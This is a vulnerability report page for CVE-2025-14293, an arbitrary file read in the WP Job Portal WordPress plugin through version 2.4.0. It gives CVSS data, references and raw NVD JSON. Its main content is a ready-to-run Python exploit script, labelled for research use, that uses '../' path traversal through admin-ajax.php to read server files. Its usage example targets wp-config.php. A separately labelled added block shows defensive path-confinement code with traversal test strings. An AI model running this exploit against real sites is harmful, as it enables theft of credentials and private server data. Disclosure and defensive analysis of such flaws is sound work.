Security Vulnerability Report
CVE-2025-14293 CVSS 6.5 MEDIUM

Published: 2025-12-11 21:15:47
Last Modified: 2026-04-15 00:35:42

Description

The WP Job Portal plugin for WordPress is vulnerable to Arbitrary File Read in all versions up to, and including, 2.4.0 via the 'downloadCustomUploadedFile' function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to read the contents of arbitrary files on the server, which can contain sensitive information.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

WP Job Portal <= 2.4.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import sys

# CVE-2025-14293 PoC - WP Job Portal Arbitrary File Read
# Affected: WP Job Portal <= 2.4.0


def exploit(target_url, cookie, file_path):
    """
    Exploit arbitrary file read vulnerability in WP Job Portal

    Args:
        target_url: Base URL of the WordPress site
        cookie: Valid session cookie (Subscriber-level or higher)
        file_path: Path to the file to read (e.g., ../../wp-config.php)
    """
    # Target endpoint with path traversal
    endpoint = f"{target_url}/wp-admin/admin-ajax.php"

    # Construct the malicious request
    params = {
        'action': 'downloadCustomUploadedFile',
        'fileid': f'../../../{file_path}'
    }
    headers = {
        'Cookie': cookie,
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)'
    }

    try:
        response = requests.get(endpoint, params=params, headers=headers, timeout=30)
        if response.status_code == 200 and len(response.content) > 0:
            print(f"[+] Successfully read file: {file_path}")
            print(f"[+] File size: {len(response.content)} bytes")
            print("\n--- File Content ---")
            print(response.text[:5000])  # Print first 5000 chars
            return True
        else:
            print(f"[-] Failed to read file. Status: {response.status_code}")
            return False
    except requests.exceptions.RequestException as e:
        print(f"[-] Request error: {e}")
        return False


if __name__ == "__main__":
    if len(sys.argv) < 4:
        print("Usage: python cve-2025-14293.py <target_url> <cookie> <file_path>")
        print("Example: python cve-2025-14293.py http://example.com 'wordpress_logged_in_xxx=yyy' 'wp-config.php'")
        sys.exit(1)

    target = sys.argv[1]
    cookie = sys.argv[2]
    file_path = sys.argv[3]
    exploit(target, cookie, file_path)
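The defensive counterpart to the traversal above, as an added example that is not the plugin's code and not part of the original report: a path-confinement check of the kind a download handler needs before serving a user-supplied file identifier, exercised against a constructed sample tree. `resolve_upload`, `demo` and the upload directory layout are hypothetical.

```python
import os
import tempfile
from typing import Optional
from urllib.parse import unquote


def resolve_upload(base_dir: str, fileid: str) -> Optional[str]:
    """Return the canonical path of fileid inside base_dir, or None if it escapes.

    Decode the parameter once, reject empty names, NUL bytes and absolute
    paths, join with the upload root, canonicalise (which also follows
    symlinks), and confirm the result is still under the root.
    base_dir is a hypothetical upload directory.
    """
    name = unquote(fileid)
    if not name or "\x00" in name or os.path.isabs(name):
        return None
    root = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(root, name))
    # commonpath, not startswith: "/srv/uploads-old" would pass a prefix test
    if os.path.commonpath([root, candidate]) != root:
        return None
    return candidate


def demo() -> dict:
    """Constructed sample tree: an uploads dir beside a config file it must never serve."""
    tmp = tempfile.mkdtemp()
    uploads = os.path.join(tmp, "uploads")
    os.makedirs(os.path.join(uploads, "sub"))
    for rel in ("uploads/resume.pdf", "uploads/sub/cover.pdf", "wp-config.php"):
        with open(os.path.join(tmp, rel), "w") as f:
            f.write("sample")
    # a symlink planted inside uploads that points outside must also be rejected
    os.symlink(os.path.join(tmp, "wp-config.php"), os.path.join(uploads, "link.txt"))
    probes = [
        "resume.pdf",               # plain name: allowed
        "sub/../resume.pdf",        # dot-dot that stays inside the root: allowed
        "../wp-config.php",         # the traversal shape used in the PoC: blocked
        "..%2F..%2Fwp-config.php",  # URL-encoded variant, decoded once: blocked
        "/etc/passwd",              # absolute path: blocked
        "link.txt",                 # symlink escaping the root: blocked
        "resume.pdf\x00.jpg",       # NUL truncation attempt: blocked
    ]
    # True means the handler would serve the file, False means it refuses
    return {p: resolve_upload(uploads, p) is not None for p in probes}
```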

References

https://plugins.trac.wordpress.org/browser/wp-job-portal/tags/2.3.9/modules/customfield/model.php#L908
https://plugins.trac.wordpress.org/browser/wp-job-portal/tags/2.4.1/modules/customfield/model.php#L908
https://www.wordfence.com/threat-intel/vulnerabilities/id/6dfcd264-39e3-44af-8e0e-5c35734524d0?source=cve

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14293", "sourceIdentifier": "[email protected]", "published": "2025-12-11T21:15:46.730", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The WP Job Portal plugin for WordPress is vulnerable to Arbitrary File Read in all versions up to, and including, 2.4.0 via the 'downloadCustomUploadedFile' function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to read the contents of arbitrary files on the server, which can contain sensitive information."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/wp-job-portal/tags/2.3.9/modules/customfield/model.php#L908", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/wp-job-portal/tags/2.4.1/modules/customfield/model.php#L908", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/6dfcd264-39e3-44af-8e0e-5c35734524d0?source=cve", "source": "[email protected]"}]}}